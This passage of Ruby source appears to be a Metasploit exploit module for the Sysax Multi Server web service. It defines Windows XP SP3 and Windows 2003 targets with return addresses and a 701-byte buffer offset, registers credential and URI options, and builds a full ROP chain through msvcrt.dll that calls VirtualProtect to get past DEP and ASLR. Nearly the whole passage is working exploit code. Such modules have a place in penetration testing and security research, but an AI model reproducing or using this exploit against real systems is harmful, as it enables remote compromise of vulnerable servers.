'Targets' =>
[
[ 'Windows XP SP3',
{
'Rop' => false,
'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe]
'Offset' => 701,
}
],
[ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
{
'Rop' => true,
'Ret' => 0x77baf605, # pivot
'Offset' => 701,
'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
}
],
],
'Privileged' => false,
'DisclosureDate'=> 'July 29, 2012',
'DefaultTarget' => 0))
register_options(
[
OptString.new('URI', [false, "URI for Multi Server", '/']),
Opt::RPORT(80),
OptString.new('SysaxUSER', [ true, "Username" ]),
OptString.new('SysaxPASS', [ true, "Password" ])
], self.class)
end
def target_url
"http://#{rhost}:#{rport}#{datastore['URI']}"
end
def create_rop_chain()
rop_gadgets = []
# All rop gadgets generated by mona.py
# Thanks corelanc0d3r for making such a great tool
if (target == targets[1]) # Windows 2003
rop_gadgets =
[
0x77be3adb, # POP EAX # RETN [msvcrt.dll]
0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
0x41414141, # Filler (compensate)
0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
0x77bdb896, # POP EBP # RETN [msvcrt.dll]
0x77be2265, # & push esp # ret [msvcrt.dll]
0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
0x77befbb4, # &Writable location [msvcrt.dll]
0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
0x90909090, # nop
0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
].flatten.pack("V*")
end
return rop_gadgets
end